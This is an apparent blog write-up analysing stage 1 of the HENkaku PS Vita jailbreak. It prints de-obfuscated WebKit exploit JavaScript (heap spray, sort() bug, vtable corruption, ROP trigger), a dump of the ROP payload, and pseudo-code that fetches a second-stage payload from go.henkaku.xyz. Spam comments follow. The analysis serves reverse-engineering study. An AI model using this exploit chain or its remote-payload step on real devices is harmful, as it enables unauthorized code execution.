Information has been reorganized to reflect the original developers' naming scheme.
HENkaku - Stage 1
Visiting http://henkaku.xyz and pressing the "Install" button results in a server side useragent check.
If the browser's useragent matches the one of a PS
Vita/PSTV on the latest firmware version (3.60), the user is redirected
to http://go.henkaku.xyz and an exploit is deployed.
This exploit re-uses elements from the older public
exploits (heap spraying method, sort() bug, scrollLeft attribute
manipulation) and pairs them with a new heap corruption technique.
Team molecule renamed variables and methods to provide a simple obfuscation layer on the HTML code.
Partially reversed HTML:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script src='payload.js'></script> | |
| <script> | |
| var r, a, e, t, n, o, l, i, f, v, s, c; | |
| var u, y, w, p, d, g, h, k, b; | |
| var A, U; | |
| var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/ | |
| m /= 4; /* 476 */ | |
| var _dview = null; | |
| /* | |
| Wrap two uint32s into double precision | |
| */ | |
| function u2d(low, hi) | |
| { | |
| if (!_dview) | |
| _dview = new DataView(new ArrayBuffer(16)); | |
| _dview.setUint32(0, hi); | |
| _dview.setUint32(4, low); | |
| return _dview.getFloat64(0) | |
| } | |
| /* | |
| Unwrap uints from double | |
| */ | |
| function d2u(d) | |
| { | |
| if (!_dview) | |
| _dview = new DataView(new ArrayBuffer(16)); | |
| _dview.setFloat64(0, d); | |
| return {low:_dview.getUint32(4),hi:_dview.getUint32(0)} | |
| } | |
| // Temporary space to store Element object | |
| var aspace_temp = new Uint32Array(1024); | |
| var word1 = 0; | |
| var word2 = 0; | |
| function swap(offset) | |
| { | |
| word1 = aspace32[offset/4]; | |
| word2 = aspace32[offset/4 + 1]; | |
| return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0 | |
| } | |
| r = 0x4000; | |
| textareas = new Array(r); | |
| aspace_arr = new Array(r); | |
| t = 0x1344; | |
| n = 0x66656463; | |
| o = 0x55555555; | |
| for (var i = 0; i < aspace_arr.length; ++i) | |
| { | |
| aspace_arr[i] = new Uint32Array(0x1344/4); | |
| var e = document.createElement("textarea"); | |
| e.rows = 0x66656463; | |
| textareas[i] = e; | |
| } | |
| /* | |
| Spray memory with Element objects | |
| */ | |
| for (var i = 0; i < 1024; ++i) | |
| { | |
| var e = document.createElement("textarea"); | |
| e.rows = 0x66656463; | |
| textareas.push(e); | |
| } | |
| var N = 0x3000; | |
| var W = Array.prototype.constructor.apply(null,new Array(0x3000)); | |
| var j = 2048; | |
| var q = new Array(2048); | |
| var z = {}; | |
| var C = new Array(256); | |
| z.toString = function() | |
| { | |
| W.push(12345); | |
| for (var r = 0; r < C.length; ++r) | |
| { | |
| var a = Array.prototype.constructor.apply(null, q); | |
| a[0] = 0; | |
| a[1] = 1; | |
| a[2] = 2; | |
| C[r] = a; | |
| } return"" | |
| }; | |
| W[0] = z; | |
| var G = u2d(0x80000000, 0x80000000); | |
| for (var i = 1; i < 8192; ++i) | |
| W[i] = G; | |
| W.sort(); | |
| contents = ""; | |
| cur = 0; | |
| z.toString = function(){}; | |
| var I = null; | |
| for (var i = 0; i < C.length; ++i) | |
| { | |
| if(C[i].length != j) | |
| { | |
| I = C[i]; | |
| break; | |
| } | |
| } | |
| var count = 0x20000000 - 0x11000; | |
| for(; ; count--) | |
| { | |
| if(I[count] != 0) | |
| { | |
| _dview.setFloat64(0, I[J]); | |
| if (_dview.getUint32(0) == t/4) | |
| { | |
| _dview.setUint32(0, 0xEFFFFFE0); | |
| I[J] = _dview.getFloat64(0); | |
| _dview.setFloat64(0, I[J - 2]); | |
| v = _dview.getUint32(4); | |
| _dview.setUint32(4, 0); | |
| _dview.setUint32(0, 0x80000000); | |
| I[J-2] = _dview.getFloat64(0); | |
| break; | |
| } | |
| } | |
| } | |
| target_aspace = null; | |
| for (var i = 0; i < aspace_arr.length; ++i) | |
| { | |
| if(aspace_arr[i].byteLength != t) | |
| { | |
| target_aspace = aspace_arr[i]; | |
| break; | |
| } | |
| } | |
| if (!target_aspace) | |
| { | |
| alert("failed"); | |
| while(1){}; | |
| } | |
| var aspace32 = target_aspace; | |
| var fkvtable = v; | |
| f = v; | |
| /* | |
| Find one of the sprayed Element objects in memory | |
| by looking for the rows of the object | |
| */ | |
| for (var addr = f/4; addr < f/4 + 0x4000; ++addr) | |
| { | |
| if (aspace32[addr] == 0x66656463) | |
| { | |
| aspace32[addr] = 0x55555555; | |
| textarea_addr = addr * 4; | |
| found_element = true; | |
| break; | |
| } | |
| } | |
| if (!found_element) | |
| { | |
| alert("Did not find Element signature"); | |
| while(1){}; | |
| } | |
| /* | |
| Change the rows of the Element object then scan the array of | |
| sprayed objects to find an object whose rows have been changed | |
| */ | |
| var found_corrupted = false; | |
| var corrupted_textarea; | |
| for (var i = 0; i < textareas.length; ++i) | |
| { | |
| if(textareas[i].rows == 0x55555555) | |
| { | |
| corrupted_textarea = textareas[i]; | |
| found_corrupted = true; | |
| break; | |
| } | |
| } | |
| if (!found_corrupted) | |
| { | |
| alert("Did not find corrupted textarea"); | |
| while(1){}; | |
| } | |
| var vtidx = textarea_addr - 0x70; | |
| var textareavptr = aspace32[vtidx/4]; | |
| scewkbase = textareavptr - 0xABB65C; | |
| scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49; | |
| scekernbase = swap(scewkbase + 0x85F464) - 0x9031; | |
| p = swap(scewkbase + 0x85D2E4) - 0x22D65; | |
| d = swap(p + 0x2C688C) - 0x9E5; | |
| g = swap(d + 0x3BC4) - 0xDC2D; | |
| scenetbase = swap(scewkbase + 0x85F414) - 0x23ED; | |
| k = swap(g + 0x18BF4) - 0xD59; | |
| b = swap(k + 0x9AB8) - 0x49CD; | |
| // Copy vtable | |
| for (var i = 0; i < 64; i++) | |
| aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i]; | |
| aspace32[vtidx/4] = fkvtable; | |
| // Save Element object | |
| for (var i = 0; i < 0x30; ++i) | |
| aspace_temp[i] = aspace32[vtidx/4 + i]; | |
| // Call setjmp | |
| aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1; | |
| // Undefine scrollLeft | |
| corrupted_textarea.scrollLeft = 0; | |
| // Save payload address (jmp context) | |
| payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0; | |
| payload_addr -= 0xEF818; | |
| // Restore Element object | |
| for (var i = 0; i < 0x30; ++i) | |
| aspace32[vtidx/4 + i] = aspace_temp[i]; | |
| payload_stack = payload_addr + 0x40; | |
| payload_code = payload_addr + 0x10000; | |
| payload_off = payload_addr/4; | |
| // Build ROP payload | |
| for (var i = 0; i < payload.length; ++i,++payload_off) | |
| { | |
| // Reached the end of ROP header (first 0x770 bytes) | |
| if (i == 476) | |
| payload_off = payload_code/4; | |
| switch(relocs[i]) | |
| { | |
| case 0: | |
| aspace32[payload_off] = payload[i]; | |
| break; | |
| case 1: | |
| aspace32[payload_off] = payload[i] + payload_stack; | |
| break; | |
| case 2: | |
| aspace32[payload_off] = payload[i] + scewkbase; | |
| break; | |
| case 3: | |
| aspace32[payload_off] = payload[i] + scekernbase; | |
| break; | |
| case 4: | |
| aspace32[payload_off] = payload[i] + scelibcbase; | |
| break; | |
| case 5: | |
| aspace32[payload_off] = payload[i] + g; | |
| break; | |
| case 6: | |
| aspace32[payload_off] = payload[i] + scenetbase; | |
| break; | |
| case 7: | |
| aspace32[payload_off] = payload[i] + b; | |
| break; | |
| default: | |
| alert("wtf?"); | |
| alert(i + " " + relocs[i]) | |
| } | |
| } | |
| // Trigger ROPchain | |
| aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */ | |
| var rchainaddr = fkvtable + 0x100; | |
| aspace32[rchainaddr/4 + 5] = payload_code; | |
| aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1; | |
| alert("Welcome to HENkaku!"); | |
| // Set scrollLeft to ROP chain | |
| corrupted_textarea.scrollLeft = rchainaddr; | |
| alert("that's it"); | |
| </script> |
Similarly to older exploits, this allows to corrupt an object's vtable and achieve ROP inside the SceWebkit module.
Offsets for libraries and relevant ROP gadgets are
fetched from a javascript file (http://go.henkaku.xyz/payload.js) during
the last stage of the exploit.
Team molecule implemented a dynamic method to relocate
gadgets and functions' offsets for each module after their base
addresses' are found (by looking at SceWebkit's import stubs).
The payload.js file contains two arrays, one containing
the payload's binary data and another containing the relocation type
for each word.
By crossing this information the exploit reads the
payload and relocates all code offsets to their target module's address
space by adding the module's base address to them:
Relocation type 0 -> Plain data stored inside the ROP space itself. No relocation needed.
Relocation type 1 -> Offset inside the ROP payload's stack.
Relocation type 2 -> Offset inside the SceWebkit module.
Relocation type 3 -> Offset inside the SceLibKernel module.
Relocation type 4 -> Offset inside the SceLibc module.
Relocation type 5 -> Offset inside the SceLibHttp module.
Relocation type 6 -> Offset inside the SceNet module.
Relocation type 7 -> Offset inside the SceAppMgr module.
Payload's generated binary data:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [HEADER] (0x40 bytes) | |
| 0x524f507e -> ROP~ | |
| 0x01000100 -> Version | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x00000730 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x000003F8 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x000C048B -> No reloc | |
| 0x00000000 -> NULL | |
| 0x000005E8 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x00000038 -> No reloc | |
| 0x00000000 -> NULL | |
| [STACK] (from 0x40 to 0x770) | |
| At 0x6F8 contains the strings: | |
| "http://go.henkaku.xyz/x" | |
| "st2" | |
| "?a1=%x" | |
| "&a2=%x&a3=%x&a4=%x&" | |
| "&a5=%x&a6=%x&a7=%x&" | |
| "ldr" | |
| [CODE] (from 0x770 to 0xB68) | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000040 -> No reloc | |
| 0x00000028 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000000ff -> No reloc | |
| 0x000003f0 -> Reloc to stack | |
| 0x00000028 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x0000675c -> Reloc to SceLibKernel | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000001b8 -> No reloc | |
| 0x000004f8 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000444 -> Reloc to stack | |
| 0x000004f8 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000676c -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000006d8 -> Reloc to stack | |
| 0x000054c8 -> Reloc to SceWebkit | |
| 0x10000100 -> No reloc | |
| 0x00600000 -> No reloc | |
| 0x0000acc9 -> Reloc to SceLibKernel | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x0000007c -> No reloc | |
| 0x00000034 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00000034 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000a791 -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000068 -> Reloc to stack | |
| 0x00001000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00130a15 -> Reloc to SceWebkit | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000006b8 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x0021a295 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x000006e4 -> Reloc to stack | |
| 0x001c6467 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x000006f0 -> Reloc to stack | |
| 0x00000000 -> Reloc to SceWebkit | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> Reloc to SceLibKernel | |
| 0x00000000 -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x0000070c -> Reloc to stack | |
| 0x00000000 -> Reloc to Unk5 | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> Reloc to SceNet | |
| 0x00000000 -> Reloc to Unk7 | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x0091b9bd -> Reloc to SceWebkit | |
| 0x00010000 -> No reloc | |
| 0x000092fd -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x00000728 -> Reloc to stack | |
| 0x00000002 -> No reloc | |
| 0x00000001 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x0000947b -> Reloc to Unk5 | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dbdd5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x0000950b -> Reloc to Unk5 | |
| 0x0010665d -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00860637 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000000bc -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x000095ff -> Reloc to Unk5 | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00009935 -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00884b85 -> Reloc to SceWebkit | |
| 0x00600000 -> No reloc | |
| 0x00927215 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x000698fb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00927215 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00009983 -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x000003e0 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000003e4 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x0000001c -> No reloc | |
| 0x000003cc -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000a789 -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x000016fd -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit |
This payload is responsible for taking care of a few things like:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Do stuff | |
| ... | |
| // Create a new thread for the second payload | |
| int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000); | |
| // Do stuff | |
| ... | |
| // Construct the arguments for fetching the second payload | |
| strcpy(stack_base + 0x000000BC, "http://go.henkaku.xyz/x"); | |
| snprintf(stack_base + 0x000002C4, 0x00000100, "?a1=%x", stack_base); | |
| strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
| snprintf(stack_base + 0x000002C4, 0x00000100, "&a2=%x&a3=%x&a4=%x&", SceWebkit_base, SceLibKernel_base, SceLibc_base); | |
| strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
| snprintf(stack_base + 0x000002C4, 0x00000100, "&a5=%x&a6=%x&a7=%x&", SceLibHttp_base, SceNet_base, SceDriverUser_base); | |
| strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
| // Do stuff | |
| ... | |
| // Send HTTP requests to fetch the second payload | |
| SceLibHttp_92fd(0x00010000); | |
| int http_buf = SceLibHttp_947b("ldr", 0x00000002, 0x00000001); | |
| SceLibHttp_950b(http_buf, stack_base + 0x000000BC, 0x00000000); | |
| int http_req = SceLibHttp_95ff(http_buf, 0x00000000, stack_base + 0x000000BC); | |
| SceLibHttp_9935(http_req, 0x00000000, 0x00000000); | |
| SceLibHttp_9983(http_req); | |
| // Do stuff | |
| ... |
After the payload is done, an HTTP request is sent to the server using the following template:
http://go.henkaku.xyz/x?a1=stack_base&a2=webkit_base&a3=libkernel_base&a4=libc_base&&a5=libhttp_base&a6=net_base&a7=appmgr_base&
Example:
http://go.henkaku.xyz/x?a1=89f02000&a2=81b009a0&a3=e000dd00&a4=811c0cc0&&a5=e0607c80&a6=e01302b0&a7=e0047bf0&
The "x" script on the server side collects the base
addresses for each module and generates a second payload to be run on
the Vita.
This second payload is composed by another ROP chain and obfuscated ARM code.
A preliminary analysis of this payload reveals a few interesting things:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| strcpy(stack_base + 0x000086B4, "sdstor0:"); | |
| strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext"); | |
| // Do stuff | |
| ... | |
| strcpy(stack_base + 0x000086E4, "molecule0:"); | |
| SceLibKernel_a4ad("molecule0:"); | |
| SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014); | |
| // Do stuff | |
| ... | |
| int thread1_id = sceKernelCreateThread("pln", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x000003FF, 0x00000000); | |
| SceLibKernel_a791(thread1_id, 0x7C); | |
| // Do stuff | |
| ... | |
| int thread2_id = sceKernelCreateThread("mhm", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000); | |
| // Do stuff | |
| ... | |
| SceNet_27E1("x", 0x00000002, 0x00000001); | |
| SceNet_27E1("x", 0x00000002, 0x00000001); | |
| SceNet_27E1("x", 0x00000002, 0x00000001); | |
| SceNet_27E1("x", 0x00000002, 0x00000001); | |
| SceNet_27E1("x", 0x00000002, 0x00000001); | |
| // Do stuff | |
| ... | |
| SceNet_27E1("sss", 0x00000002, 0x00000001); | |
| SceNet_27E1("tst", 0x00000002, 0x00000007); | |
| SceNet_27E1("tmp", 0x00000002, 0x00000001); | |
| // Do stuff | |
| ... |
Next up, stage 2!
Greetings! Very useful advice within this
ReplyDeletearticle! It’s the little changes that make the greatest changes.
Thanks a lot for sharing! 토토365프로
ReplyDeleteI'm extremely impressed with your writing skills as well as with the layout on your blog.
I totally agree with what you said. Thank you for leaving comments.
ReplyDeleteI am happy to find your distinguished way of writing the post.
ReplyDeleteThank you for the post. Feel free to visit my website;
ReplyDeleteYou know your projects stand out of the herd.
ReplyDeleteIt seems to me all of them are really brilliant!
ReplyDeleteI think I would never comprehend. It seems too complicated and extremely broad for me.
ReplyDeleteWell I definitely enjoyed studying it.
ReplyDeleteGreat blog, I enjoyed reading
ReplyDeleteThis is a great inspiring article. Good work you have on this. Keep it up.
ReplyDeleteYou put helpful information. Keep blogging man. Thankyou for sharing
ReplyDeleteGreat job. Looking to read this next post. Keep up the amazing spirit. Thanks
ReplyDeleteI located the information very useful. You're a great author in this generation, thanks
ReplyDeleteExtremely helpful info. I love this information. Thank you and best of luck.
ReplyDelete